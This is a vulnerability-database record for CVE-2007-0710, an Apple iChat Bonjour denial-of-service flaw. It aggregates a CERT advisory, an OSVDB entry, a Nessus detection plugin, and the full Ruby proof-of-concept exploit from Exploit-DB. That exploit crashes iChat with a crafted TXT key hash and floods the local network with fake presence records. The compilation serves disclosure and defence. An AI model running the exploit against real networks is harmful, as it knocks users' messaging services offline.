ID: CVE-2007-0710
Type: cve
Reporter: cve@mitre.org
Modified: 2008-09-05T21:18:00
Description
The Bonjour functionality in iChat in Apple Mac OS X 10.3.9 allows remote attackers to cause a denial of service (persistent application crash) via unspecified vectors, possibly related to CVE-2007-0614.
{"cert": [{"lastseen": "2019-10-09T19:51:04", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability in the way Apple iChat handles specially crafted TXT key hashes could lead to denial of service.\n\n### Description \n\nApple [iChat](<http://www.apple.com/macosx/features/ichat/>) is an instant message client for Apple Mac OS X. Apple iChat Agent is a back-end process that manages iChat sessions and available contacts. Apple [Bonjour](<http://developer.apple.com/networking/bonjour/index.html>) is a service provided with Apple Mac OS X that facilitates automatic discovery of computers, devices, and services on IP networks. The iChat Agent uses Bonjour to discover available contacts. The Apple iChat Agent contains a vulnerability that could be exploited when it attempts to handle specially crafted TXT key hashes received via Bonjour messages. According to [MOAB-29-01-2007](<http://projects.info-pull.com/moab/MOAB-29-01-2007.html>):\n\n_This will instantly cause a SIGTRAP signal to be sent to the process, causing a so-called 'crash'. Further attempts to launch iChat Bonjour functionality again will fail as mDNSResponder keeps the crafted record (and restarting it will be necessary)._ \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker on the same multicast network may be able to cause iChat to crash, thereby creating a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Update**\n\nApple has released an update to address this issue. See Apple Security Update [2007-002](<http://docs.info.apple.com/article.html?artnum=305102>). \n \n--- \n \n### Vendor Information\n\n836024\n\n### Apple Computer, Inc.\n\nUpdated: February 16, 2007 \n\n### Status\n\nVulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-002](<http://docs.info.apple.com/article.html?artnum=305102>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23836024 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://projects.info-pull.com/moab/MOAB-29-01-2007.html>\n * <http://secunia.com/advisories/23945/>\n * <http://docs.info.apple.com/article.html?artnum=305102>\n * <http://secunia.com/advisories/24198/>\n * <http://www.apple.com/macosx/features/ichat/>\n * <http://developer.apple.com/networking/bonjour/index.html>\n * <http://securitytracker.com/alerts/2007/Feb/1017661.html>\n * <http://www.securityfocus.com/bid/22304>\n\n### Acknowledgements\n\nThis issue was reported by LMH in MOAB-29-01-2007.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0710](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0710>) \n---|--- \n**Severity Metric:** | 2.48 \n**Date Public:** | 2007-01-30 \n**Date First Published:** | 2007-02-26 \n**Date Last Updated:** | 2007-03-16 12:36 UTC \n**Document Revision:** | 22 \n", "modified": "2007-03-16T12:36:00", "published": "2007-02-26T00:00:00", "id": "VU:836024", "href": "https://www.kb.cert.org/vuls/id/836024", "type": "cert", "title": "Apple iChat fails to properly handle crafted TXT key hashes", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": 
"2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nApple iChat improperly parses TXT key hashes which may allow a remote denial of service. The issue is triggered when the Apple iChat Agent receives a specially crafted TXT key hash via Bonjour triggering a NULL pointer dereference and resulting in a loss of availability for the iChat service.\n## Technical Description\n- Since the exploitation vector is Bonjour, which is a broadcasting service, one can use the exploit to affect a large number of users which can be reached via service advertisements, however, the remote attacker has to be on the same multicast network as the user.\n- A specially crafted TXT key hash sent via the Bonjour service will cause the iChat Agent to raise an exception (SIGTRAP signal 0x9262050b in _NSRaiseError()) due to a NULL pointer dereference.\n- The PoC author noted that this should be considered an issue in Bonjour's mDNSResponder daemon as well since iChat isn't involved in the processing of any mDNS service advertisements. mDNSResponder stops responding shortly after abuse and trying to launch iChat Bonjour functionality again will fail since mDNSResponder keeps the crafted record.\n## Solution Description\nDownload and install Security Update 2007-002 (PPC) via Software Update preferences, or from Apple Downloads, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): \n- Do not use iChat with the Bonjour service.\nor\n- Disable mDNSResponder using the following (by author):\nsudo launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist\nsudo mv /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist \\\n/Users/Shared/com.apple.mDNSResponder.plist.BACKUP\n## Short Description\nApple iChat improperly parses TXT key hashes which may allow a remote denial of service. 
The issue is triggered when the Apple iChat Agent receives a specially crafted TXT key hash via Bonjour triggering a NULL pointer dereference and resulting in a loss of availability for the iChat service.\n## References:\nVendor Specific Solution URL: http://www.apple.com/support/downloads/securityupdate2007002ppc.html\nVendor Specific News/Changelog Entry: http://docs.info.apple.com/article.html?artnum=305102\nSecurity Tracker: 1017661\n[Secunia Advisory ID:24198](https://secuniaresearch.flexerasoftware.com/advisories/24198/)\n[Related OSVDB ID: 32715](https://vulners.com/osvdb/OSVDB:32715)\n[Related OSVDB ID: 32714](https://vulners.com/osvdb/OSVDB:32714)\nOther Advisory URL: http://projects.info-pull.com/moab/MOAB-29-01-2007.html\nMail List Post: http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html\nGeneric Informational URL: http://developer.apple.com/documentation/Cocoa/Conceptual/NetServices/Articles/about.html\nGeneric Informational URL: http://projects.info-pull.com/moab/MOAB-09-01-2007.html\nGeneric Informational URL: http://projects.info-pull.com/moab/MOAB-20-01-2007.html\nGeneric Informational URL: http://www.apple.com/ichat/\nGeneric Exploit URL: http://projects.info-pull.com/moab/bug-files/MOAB-29-01-2007.rb\n[CVE-2007-0710](https://vulners.com/cve/CVE-2007-0710)\n[CVE-2007-0614](https://vulners.com/cve/CVE-2007-0614)\nCERT VU: 836024\nBugtraq ID: 22304\n", "modified": "2007-01-29T12:00:00", "published": "2007-01-29T12:00:00", "href": "https://vulners.com/osvdb/OSVDB:32713", "id": "OSVDB:32713", "title": "Apple iChat Improper TXT Key Hash Handling DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:01:06", "bulletinFamily": "exploit", "description": "Apple iChat Bonjour 3.1.6.441 Multiple Denial of Service Exploit. CVE-2007-0613,CVE-2007-0614,CVE-2007-0710. 
Dos exploit for osx platform", "modified": "2007-01-30T00:00:00", "published": "2007-01-30T00:00:00", "id": "EDB-ID:3230", "href": "https://www.exploit-db.com/exploits/3230/", "type": "exploitdb", "title": "Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit", "sourceData": "#!/usr/bin/ruby\n# (c) 2006 Lance M. Havok <lmh [at] info-pull.com>\n# All Rights Reserved.\n# basic proof of concept for MOAB-29-01-2007\n#\n\nrequire 'digest/sha1'\nrequire 'rubygems'\nrequire 'net/dns/mdns-sd'\n\nbugselected = (ARGV[0] || \"0\").to_i\nTMP_ARR = []\nDNSSD = Net::DNS::MDNSSD\n\ntrap(\"INT\") {\n puts \"++ Exiting...\"\n begin\n TMP_ARR.each do |o|\n o.stop\n end\n rescue\n end\n\n exit\n}\n\n#\n# This method abuses a design weakness in iChat Bonjour services, allowing an user\n# to conduct a denial of service attack against reachable clients by registering multiple\n# (fake) _presence records.\n#\ndef oh_gnoes_contact_dos(status_msg = \"ekoC stronS reztleS yrraL\".reverse,\n firstname = 'Pwnies',\n lastname = 'Mgheetacek')\n \n available_status = [ \"avail\", \"away\" ]\n cur_status = available_status[rand(available_status.size)]\n\n # the TXT keys (see http://www.xmpp.org/extensions/xep-0174.html)\n keyset = { \"status\" => cur_status, # - presence availability of the user\n \"msg\" => status_msg, # - user's state\n \"vc\" => \"CUAV!\", # - user's ability for A/V conferencing\n \"1st\" => firstname, # - first name of the user\n \"last\" => lastname, # - last name of the user\n \"txtvers\" => \"1\", # - version of the TXT fields supported\n \"phsh\" => Digest::SHA1.hexdigest(rand(0xffffffff).to_s), # - fake SHA-1 hash of icon\n \"port.p2pj\" => \"1337\" # - Port for link-local communications\n # (ignored).\n }\n\n count = 0\n while true\n rand_str = \"3891ecniSrevoLyaGeipmaerCterceSkecatPreztleSyrraL\".reverse\n (rand_str.length-1).downto(1) do |c|\n n = rand(c) + 1\n rand_str[c], rand_str[n] = rand_str[n], rand_str[c]\n end\n \n puts \"++ Registering presence 
#{count}\"\n # TODO: add NULL record with user avatar icon (ex. Larry Seltzer's taliban bearded face)\n dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)\n #sleep 40\n TMP_ARR << dos_handle\n count += 1\n end\nend\n\n#\n# This method causes iChat Agent to raise an exception (SIGTRAP signal) with a crafted TXT key hash.\n# Program received signal SIGTRAP, Trace/breakpoint trap.\n# 0x9262050b in _NSRaiseError ()\n#\ndef format_dos()\n keyset = { \"status\" => \"avail\", \"msg\" => \"I'm the Doomed eWook\", \"vc\" => \"CUAV!\", \"1st\" => \"Larry\",\n \"last\" => \"Seltzer\", \"txtvers\" => \"1\", \"phsh\" => (\"\\250\" * 40),\n \"port.p2pj\" => \"1337\" }\n \n rand_str = \"nabilaTAsAlufrewoPsIyrraL\".reverse\n (rand_str.length-1).downto(1) do |c|\n n = rand(c) + 1\n rand_str[c], rand_str[n] = rand_str[n], rand_str[c]\n end\n \n dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)\n dos_handle.stop\nend\n\n#\n# Proof of concept method selection below.\n#\n\nputs \"++ MOAB-29-01-2007: iChat Bonjour Fun\"\nputs \"++ Selected target: #{bugselected}\"\ncase bugselected\n when 0\n format_dos()\n when 1\n if (ARGV[1] and ARGV[2] and ARGV[3])\n oh_gnoes_contact_dos(ARGV[1], ARGV[2], ARGV[3])\n else\n oh_gnoes_contact_dos()\n end\nend\n\n# milw0rm.com [2007-01-30]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3230/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Multiple problems because of insecure dynamic DNS usage.", "modified": "2007-02-01T00:00:00", "published": "2007-02-01T00:00:00", "id": "SECURITYVULNS:VULN:7140", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7140", "title": "Multiple Apple iChat Bonjour DoS conditions", "type": "securityvulns", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T02:50:04", "bulletinFamily": "scanner", "description": "The remote host is running a version of Mac OS X 10.4 that does not\nhave Security Update 2007-002 applied. \n\nThis update fixes security flaws in the following applications :\n\n- Finder\n- iChat\n- UserNotification", "modified": "2019-11-02T00:00:00", "id": "MACOSX_SECUPD2007-002.NASL", "href": "https://www.tenable.com/plugins/nessus/24354", "published": "2007-02-16T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24354);\n script_version (\"1.16\");\n\n script_cve_id(\"CVE-2007-0021\", \"CVE-2007-0023\", \"CVE-2007-0197\", \"CVE-2007-0613\", \"CVE-2007-0614\", \"CVE-2007-0710\");\n script_bugtraq_id(21980, 22146, 22188, 22304);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-002)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update which fixes several\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 that does not\nhave Security Update 2007-002 applied. 
\n\nThis update fixes security flaws in the following applications :\n\n- Finder\n- iChat\n- UserNotification\" );\n # http://web.archive.org/web/20080110231039/http://docs.info.apple.com/article.html?artnum=305102\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22a97335\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-002 :\n\nhttp://www.apple.com/support/downloads/securityupdate2007002universal.html\nhttp://www.apple.com/support/downloads/securityupdate2007002panther.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/15\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\nscript_end_attributes();\n\n script_summary(english:\"Check for the presence of the SecUpdate 2007-002\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! 
packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-8]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[2-9]|200[89]-|20[1-9][0-9]-)\", string:packages)) \n security_hole(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}